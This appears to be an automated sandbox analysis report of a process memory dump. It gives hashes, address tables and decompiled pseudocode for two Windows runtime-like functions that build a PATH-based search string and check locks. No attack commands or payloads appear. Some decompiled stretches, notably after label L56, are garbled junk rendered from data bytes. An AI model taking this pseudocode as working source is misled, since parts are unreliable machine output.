0x00000000
0x00000000
0x01154835
0x0115483a
0x0115483d
0x0115483f
0x01154842
0x01154842
0x01154842
0x01154846
0x0115484c
0x0115484e
0x01154851
0x01154851
0x01154853
0x01154854
0x01154854
0x01154858
0x0115485a
0x0115485a
0x0115485d
0x0115485f
0x01154861
0x01154861
0x01154866
0x0115486b
0x0115486e
0x01154871
0x01154876
0x01154876
0x01154878
0x0115487b
0x01154884
0x01154884
0x00000000
0x0115487d
0x0115487d
0x01154882
0x01154889
0x01154889
0x0115488f
0x01154891
0x011548e0
0x011548e2
0x011548e4
0x011548e4
0x011548e7
0x011548e7
0x011548ed
0x011548f4
0x011548f6
0x01154951
0x01154951
0x01154953
0x01154953
0x01154956
0x01154956
0x01154958
0x01154959
0x01154959
0x0115495d
0x0115495d
0x0115495f
0x0115495f
0x01154965
0x01154969
0x011549ba
0x011549ba
0x011549c1
0x011549c5
0x011549cc
0x011549d4
0x011549d7
0x011549da
0x011549e4
0x011549e5
0x011549f3
0x01154a02
0x00000000
0x01154a02
0x01154972
0x01154974
0x00000000
0x00000000
0x01154976
0x01154979
0x01154982
0x01154983
0x01154984
0x0115498b
0x0115498d
0x01154991
0x01154993
0x01154999
0x0115499d
0x011549a2
0x011549a2
0x011549a2
0x01154999
0x011549ac
0x00000000
0x011549b3
0x011548f8
0x011548fe
0x00000000
0x00000000
0x00000000
0x011548fe
0x01154895
0x0115489c
0x011548ad
0x011548b2
0x011548b5
0x011548b7
0x011548ba
0x011548bc
0x011548c6
0x011548c6
0x011548cb
0x011548d1
0x011548d4
0x011548d8
0x011548d8
0x00000000
0x011548d8
0x011548be
0x011548c0
0x00000000
0x00000000
0x011548c2
0x00000000
0x00000000
0x00000000
0x011548c4
0x00000000
0x01154882
0x0115487b
0x01154904
0x01154906
0x00000000
0x00000000
0x01154908
0x0115490e
0x00000000
0x00000000
0x01154910
0x01154917
0x01154917
0x00000000
0x01154917
0x010fb1ba
0x011547f9
0x011547fc
0x00000000
0x00000000
0x00000000
0x011547fc
0x010fb1c0
0x010fb1c0
0x010fb1c3
0x010fb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 011548AD

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e05bdb775601b38609bcca839e60ba53deda18cc6424d85df682d75db8d87026
Instruction ID: 044f07a1d4fa4ba303313fb2e40eafdb8abbcfbbb2d32fa250d3bb32780feb6f
Opcode Fuzzy Hash: e05bdb775601b38609bcca839e60ba53deda18cc6424d85df682d75db8d87026
Instruction Fuzzy Hash: 0B51B371D00259CFEF798FA8C8457AEBBB0BF04714F1041ADDD699B682E7704981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01122581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E01122581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200334, char _a1546912014) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				void* _t242;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				intOrPtr _t276;
				signed int _t278;
				signed int _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t295;
				intOrPtr _t307;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t323;
				signed int _t324;
				void* _t326;
				signed int _t327;
				signed int _t329;
				signed int _t332;
				void* _t333;
				void* _t335;

				_t329 = _t332;
				_t333 = _t332 - 0x4c;
				_v8 =  *0x11ed360 ^ _t329;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t323 = 0x11eb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t276 = 0x48;
				_t305 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t316 = 0;
				_v37 = _t305;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t324 = 0xc0000106;
						goto L32;
					} else {
						_t323 = L01114620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t323;
						__eflags = _t323;
						if(_t323 == 0) {
							_t324 = 0xc0000017;
							goto L32;
						} else {
							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
							_t50 = _t323 + 0x48; // 0x48
							_t318 = _t50;
							_t305 = _v32;
							 *((intOrPtr*)(_t323 + 0x3c)) = _t276;
							_t278 = 0;
							 *((short*)(_t323 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t323 + 0x18) = _t318;
								__eflags = _t305 - 0x11e8478;
								 *_t323 = ((0 | _t305 == 0x011e8478) - 0x00000001 & 0xfffffffb) + 7;
								E0113F3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t333 = _t333 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E011839F2(_t318);
									_t305 = _v32;
									_t318 = _t270;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t324 = _v68;
								__eflags = 0;
								 *((short*)(_t318 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t323 + _t278 * 4;
								_v56 = _t280;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t237 =  *(_v60 + _t289 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t289 * 4);
										 *(_t280 + 0x18) = _t318;
										_t241 =  *(_v60 + _t289 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M01122959))) {
												case 0:
													__ax =  *0x11e8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0113F3E0(__edi,  *0x11e848c, __ax & 0x0000ffff);
														__eax =  *0x11e8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0113F3E0(_t318, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x11e8480 & 0x0000ffff = E0113F3E0(__edi,  *0x11e8484,  *0x11e8480 & 0x0000ffff);
													__eax =  *0x11e8480 & 0x0000ffff;
													__eax = ( *0x11e8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0113F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0113F3E0(_t318, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t333 = _t333 + 0xc;
													_t318 = _t318 + (_t265 >> 1) * 2 + 2;
													__eflags = _t318;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t318 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx =  *0x11e575c;
													__eflags = __ebx - 0x11e575c;
													if(__ebx != 0x11e575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0113F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x11e575c;
														} while (__ebx != 0x11e575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x11e8478 & 0x0000ffff = E0113F3E0(__edi,  *0x11e847c,  *0x11e8478 & 0x0000ffff);
													__eax =  *0x11e8478 & 0x0000ffff;
													__eax = ( *0x11e8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E011839F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x11e6e58 & 0x0000ffff = E0113F3E0(__edi,  *0x11e6e5c,  *0x11e6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x11e6e58 & 0x0000ffff;
													__eax = ( *0x11e6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t316 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M01122935))) {
							case 0:
								__ax =  *0x11e8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E01122E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x11e8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x11e8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0110EEF0(0x11e79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0110EB70(__ecx, 0x11e79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t324;
												if(_t324 < 0) {
													L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x11e7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0110EB70(__ecx, 0x11e79a0);
										__eax = _v52;
										L36:
										_pop(_t317);
										_pop(_t325);
										__eflags = _v8 ^ _t329;
										_pop(_t277);
										return E0113B640(_t216, _t277, _v8 ^ _t329, _t305, _t317, _t325);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t274 = E01122E3E(_t272,  &_v36);
									_t285 = _v36;
									_v76 = _t274;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x11e5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x11e8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x11e8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x11e6e58 & 0x0000ffff;
								__eax = ( *0x11e6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t316 = _t316 + 1;
								if(_t316 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t290 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("adc al, [ecx]");
					asm("o16 sub [edx], dl");
					_t242 = _t241 + _t333;
					asm("daa");
					asm("adc al, [ecx]");
					asm("adc al, [es:ecx]");
					_t326 = _t323 + 1;
					 *_t305 =  *_t305 - _t305;
					 *0x1f011226 =  *0x1f011226 + _t242;
					_pop(_t281);
					_push(ss);
					 *((intOrPtr*)(_t242 +  &_a1530200334)) =  *((intOrPtr*)(_t242 +  &_a1530200334)) + _t305;
					_push(ss);
					 *_t305 =  *_t305 + _t242;
					 *_t305 =  *_t305 - _t305;
					 *((intOrPtr*)(_t242 - 0x9feedd8)) =  *((intOrPtr*)(_t242 - 0x9feedd8)) + _t242;
					asm("daa");
					asm("adc al, [ecx]");
					_push(ds);
					 *_t305 =  *_t305 - _t305;
					 *((intOrPtr*)(_t326 + 0x28)) =  *((intOrPtr*)(_t326 + 0x28)) + _t290;
					asm("adc al, [ecx]");
					asm("daa");
					asm("adc al, [ecx]");
					asm("fcomp dword [ebx+0x16]");
					 *((intOrPtr*)(_t242 +  &_a1546912014)) =  *((intOrPtr*)(_t242 +  &_a1546912014)) + _t326;
					_push(ss);
					_t335 = _t333 + _t290;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x11cff00);
					E0114D08C(_t281, _t318, _t326);
					_v44 =  *[fs:0x18];
					_t319 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t327 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t295 = _t247 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x10d1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E0113E5C0(_a8,  *((intOrPtr*)(_t295 + 0x10d1668)), _t282);
									_t335 = _t335 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t327 = E011751BE(_t282,  *((intOrPtr*)(_v48 + 0x10d166c)), _a16, _t319, _t327, __eflags, _a20, _a24);
										_v52 = _t327;
										break;
									} else {
										_t247 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t327;
						__eflags = _t327;
						if(_t327 < 0) {
							__eflags = _t327 - 0xc0000100;
							if(_t327 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t319;
									if( *_t291 == _t319) {
										_t327 = 0xc0000100;
										goto L76;
									} else {
										_t307 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t307 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t291) {
											__eflags =  *(_t307 + 0x1c);
											if( *(_t307 + 0x1c) == 0) {
												L106:
												_t327 = E01122AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t327;
												__eflags = _t327 - 0xc0000100;
												if(_t327 != 0xc0000100) {
													goto L69;
												} else {
													_t319 = 1;
													_t291 = _v36;
													goto L75;
												}
											} else {
												_t252 = E01106600( *(_t307 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L106;
												} else {
													_t291 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t327 = E01122C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
											L76:
											_v32 = _t327;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0110EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t327 = _a24;
									_t259 = E01122AE4( &_v36, _a8, _t282, _a16, _a20, _t327);
									_v32 = _t259;
									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E01122C50(_v36, _a8, _t282, _a16, _a20, _t327, 1);
									}
									_v8 = _t319;
									E01122ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t245 = _t327;
					}
					L70:
					return E0114D0D1(_t245);
				}
				L108:
			}

0x01122584
0x01122586
0x01122590
0x01122596
0x01122597
0x01122598
0x01122599
0x0112259e
0x011225a4
0x011225a9
0x011225ac
0x011225ae
0x011225b1
0x011225b2
0x011225b5
0x011225b8
0x011225bb
0x011225bc
0x011225bf
0x011225c2
0x011225c5
0x011225c6
0x011225cb
0x011225ce
0x011225d8
0x011225dd
0x011225de
0x011225e1
0x011225e3
0x011225e9
0x011226da
0x011226da
0x011226dd
0x011226e2
0x01165b56
0x00000000
0x011226e8
0x011226f9
0x011226fb
0x011226fe
0x01122700
0x01165b60
0x00000000
0x01122706
0x01122706
0x0112270a
0x0112270a
0x0112270d
0x01122713
0x01122716
0x01122718
0x0112271c
0x0112271e
0x01165b6c
0x01165b6f
0x01165b7f
0x01165b89
0x01165b8e
0x01165b93
0x01165b96
0x01165b9c
0x01165ba0
0x01165ba3
0x01165bab
0x01165bb0
0x01165bb3
0x01165bb3
0x01165ba3
0x01122724
0x01122726
0x01122729
0x0112272c
0x0112279d
0x0112279d
0x011227a0
0x011227a2
0x00000000
0x0112272e
0x0112272e
0x01122731
0x01122734
0x01122734
0x01122736
0x01165bc1
0x01165bc1
0x01165bc4
0x00000000
0x01165bca
0x01165bca
0x01165bcd
0x00000000
0x01165bd3
0x00000000
0x01165bd3
0x01165bcd
0x0112273c
0x0112273c
0x01122742
0x01122747
0x0112274a
0x0112274d
0x01122750
0x00000000
0x01122756
0x01122756
0x00000000
0x01122902
0x01122908
0x0112290b
0x00000000
0x01122911
0x0112291c
0x01122921
0x00000000
0x01122921
0x00000000
0x00000000
0x01122880
0x01122887
0x0112288c
0x00000000
0x00000000
0x01122805
0x0112280a
0x01122814
0x01122816
0x00000000
0x00000000
0x0112281e
0x01122821
0x01122823
0x00000000
0x01122829
0x01122829
0x01122831
0x0112283c
0x0112283e
0x00000000
0x0112283e
0x00000000
0x00000000
0x0112284e
0x01122850
0x01122851
0x01122854
0x01122857
0x0112285a
0x0112285c
0x0112285d
0x00000000
0x00000000
0x0112275d
0x01122761
0x00000000
0x01122767
0x0112276e
0x01122773
0x01122773
0x01122776
0x01122778
0x0112277e
0x0112277e
0x01122781
0x01122781
0x01122783
0x01122784
0x00000000
0x00000000
0x01165bd8
0x01165bde
0x01165be4
0x01165be6
0x01165be8
0x01165be9
0x01165bee
0x01165bf8
0x01165bff
0x01165c01
0x01165c04
0x01165c07
0x01165c0b
0x01165c0d
0x01165c0d
0x01165c15
0x01165c18
0x01165c1b
0x01165c1b
0x01165c1e
0x00000000
0x00000000
0x011228c3
0x011228c8
0x011228d2
0x011228d4
0x011228d8
0x011228db
0x01165c26
0x01165c28
0x01165c2d
0x01165c2d
0x00000000
0x00000000
0x01165c34
0x01165c36
0x01165c49
0x01165c4e
0x01165c54
0x01165c5b
0x01165c5d
0x01165c60
0x01122788
0x01122788
0x0112278b
0x0112278e
0x0112278e
0x0112278e
0x01122791
0x00000000
0x00000000
0x01122756
0x01122750
0x00000000
0x01122794
0x01122794
0x01122795
0x01122798
0x01122798
0x00000000
0x01122734
0x0112272c
0x01122700
0x011225ef
0x011225ef
0x011225ef
0x011225f2
0x011225f8
0x00000000
0x00000000
0x011225fe
0x00000000
0x011228e6
0x011228ec
0x011228ef
0x011228f5
0x011228f8
0x011228f8
0x00000000
0x011228f8
0x00000000
0x00000000
0x01122866
0x01122866
0x01122876
0x01122879
0x00000000
0x00000000
0x011227e0
0x011227e7
0x011227e9
0x011227eb
0x01165afd
0x00000000
0x01165afd
0x00000000
0x00000000
0x01122633
0x01122638
0x0112263b
0x0112263c
0x0112263e
0x01122640
0x01122642
0x01122647
0x01122649
0x0112264e
0x01122650
0x01122653
0x01122659
0x011226a2
0x011226a7
0x011226ac
0x011226b2
0x01165b11
0x01165b15
0x01165b17
0x00000000
0x011226b8
0x011226b8
0x011226ba
0x011227a6
0x011227a6
0x011227a9
0x011227ab
0x011227b9
0x011227b9
0x011227be
0x011227c1
0x011227c3
0x011227c5
0x011227c7
0x01165c74
0x01165c79
0x01165c79
0x011227c7
0x00000000
0x011226c0
0x011226c0
0x011226c3
0x011226c6
0x011226c6
0x011226c9
0x011226c9
0x00000000
0x011226c9
0x011226ba
0x0112265b
0x0112265b
0x0112265e
0x01122667
0x0112266d
0x01122677
0x0112267c
0x0112267f
0x01122681
0x01165b49
0x01165b4e
0x011227cd
0x011227d0
0x011227d1
0x011227d2
0x011227d4
0x011227dd
0x01122687
0x01122687
0x0112268a
0x0112268b
0x0112268e
0x0112268f
0x01122691
0x01122696
0x01122698
0x0112269d
0x0112269f
0x00000000
0x0112269f
0x01122681
0x00000000
0x00000000
0x01122846
0x00000000
0x00000000
0x01122605
0x0112260a
0x0112260c
0x01122611
0x01122616
0x01122619
0x01122619
0x0112261e
0x00000000
0x01122624
0x01122627
0x01122627
0x00000000
0x00000000
0x01165b1f
0x00000000
0x00000000
0x01122894
0x0112289b
0x0112289d
0x011228a1
0x01165b2b
0x01165b2e
0x01165b2e
0x011228a7
0x011228a9
0x01165b04
0x01165b09
0x01165b09
0x01165b09
0x00000000
0x00000000
0x01165b35
0x01165b3c
0x011228fb
0x011228fb
0x011226cc
0x011226cc
0x011226d0
0x00000000
0x011226d2
0x011226d2
0x00000000
0x011226d2
0x00000000
0x00000000
0x011225fe
0x0112292d
0x0112292f
0x01122930
0x01122935
0x01122937
0x01122939
0x0112293c
0x0112293e
0x0112293f
0x01122941
0x01122945
0x01122946
0x01122948
0x0112294e
0x0112294f
0x01122950
0x01122957
0x01122958
0x0112295a
0x0112295c
0x01122962
0x01122963
0x01122965
0x01122966
0x01122968
0x0112296b
0x0112296e
0x0112296f
0x01122971
0x01122974
0x0112297b
0x0112297c
0x0112297e
0x0112297f
0x01122980
0x01122981
0x01122982
0x01122983
0x01122984
0x01122985
0x01122986
0x01122987
0x01122988
0x01122989
0x0112298a
0x0112298b
0x0112298c
0x0112298d
0x0112298e
0x0112298f
0x01122990
0x01122992
0x01122997
0x011229a3
0x011229a6
0x011229ab
0x011229ad
0x011229b0
0x011229b2
0x01165c80
0x011229b8
0x011229b8
0x011229bb
0x011229c0
0x011229c5
0x011229c6
0x011229c6
0x011229c9
0x011229cb
0x00000000
0x00000000
0x011229cd
0x011229d0
0x011229d9
0x011229db
0x011229dd
0x01122a7f
0x01122a84
0x01122a87
0x01122a89
0x01165ca1
0x01165ca3
0x00000000
0x01122a8f
0x01122a8f
0x00000000
0x01122a8f
0x00000000
0x011229e3
0x011229e3
0x011229e3
0x00000000
0x011229e3
0x011229dd
0x00000000
0x011229db
0x011229e6
0x011229e9
0x011229eb
0x011229ed
0x011229f3
0x011229f5
0x011229f8
0x011229fa
0x01122a97
0x01122a9a
0x01122a9d
0x01122add
0x00000000
0x01122a9f
0x01122aa2
0x01122aa5
0x01122aa8
0x01122aab
0x01165cab
0x01165caf
0x01165cc5
0x01165cda
0x01165cdc
0x01165cdf
0x01165ce5
0x00000000
0x01165ceb
0x01165ced
0x01165cee
0x00000000
0x01165cee
0x01165cb1
0x01165cb4
0x01165cb9
0x01165cbb
0x00000000
0x01165cbd
0x01165cbd
0x00000000
0x01165cbd
0x01165cbb
0x01122ab1
0x01122ab1
0x01122ac4
0x01122ac6
0x01122ac6
0x00000000
0x01122ac6
0x01122aab
0x00000000
0x01122a00
0x01122a09
0x01122a0e
0x01122a21
0x01122a24
0x01122a35
0x01122a3a
0x01122a3d
0x01122a42
0x01122a59
0x01122a59
0x01122a5c
0x01122a5f
0x01122a5f
0x011229fa
0x011229f3
0x01122a64
0x01122a64
0x01122a6b
0x01122a6b
0x01122a6d
0x01122a72
0x01122a72
0x00000000

Strings

PATH, xrefs: 01122642, 01122691

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 887ecb963f124f63760961d8c374345c63ad0525c41dd9ac893f57e681a9cf71
Instruction ID: 517b9af72e786b65d87fe409c1b8244c881ed531ff0ace3938664a9c2d0799cd
Opcode Fuzzy Hash: 887ecb963f124f63760961d8c374345c63ad0525c41dd9ac893f57e681a9cf71
Instruction Fuzzy Hash: 3BC1B072E04629DBDB2DDF98D880BADBBF5FF58740F094029E901BB250E774A851CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0112FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0112FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0110EEF0(0x11e7b60);
					_t134 =  *0x11e7b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x11e7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x11e7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
